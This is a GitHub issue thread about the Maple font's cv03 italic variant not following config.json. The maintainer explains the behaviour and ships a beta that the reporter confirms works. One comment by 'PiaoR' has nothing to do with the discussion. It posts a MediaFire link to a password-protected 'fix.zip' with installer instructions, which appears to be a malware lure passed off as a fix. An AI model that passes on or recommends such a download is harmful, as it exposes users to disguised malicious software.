### ISSUE TITLE
Enabling CV3 on Font_Freeze_Italic Does not seem to work

### ISSUE THREAD

**Issue by vikky49** [subframe7536/maple-font#235]
HI. Great work on the font. Loving it. Very legible and so clean. So good.

I have enabled this in config.json
```

  "feature_freeze_italic": {
    "cv01": "enable",
    "cv02": "ignore",
    "cv03": "enable",
    "cv04": "ignore",
    "cv98": "ignore",
    "cv99": "ignore",
    "ss01": "enable",
    "ss02": "ignore",
    "ss03": "ignore",
    "ss04": "ignore",
    "zero": "ignore"
  },

```
While the normal font seems to be built with an alternative, the italic does not respect the config. While the others are working as expected. The issue appears to be happening for CV3 on Italic fonts

**Comment by subframe7536** [comment]
Thanks for your love😊

The `cv03` is a flag for `i` without left bottom bar. In italic font, it is designed as default.

If you want to make `i` similar to the regular style, you should enable `ss01`.

And the ligature config will might be changed in next beta release later this week. I will share some thoughts in the discussion.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by subframe7536** [comment]
see in #240

**Comment by vikky49** [comment]
Thanks . I love the ligatures as is and I also like the config you provided for building the font. I use that customizations to make my own build.

My only thought process is the variation of the font should be equal in both the regular and Italic. Example the cv03 "i" should be same in both the variants for consistency I guess.

I love JetBrains Mono but the way you turned JetBrains Mono into this beautiful font is amazing. It looks so beautiful when staring at the screen especially when writing code for long hours.

Really appreciate the work. Please do let me know if I can be of any help in contributing

Thanks

**Comment by subframe7536** [comment]
Hey👋

v7.0-beta28 released, could you please have another try?

**Comment by vikky49** [comment]
Thanks, @subframe7536. I just tested it, and it works great. We can close this ticket. Once again, great work. Cant get over the font. I want to keep looking at it. With all the JetBrains Mono elegance with extra beauty
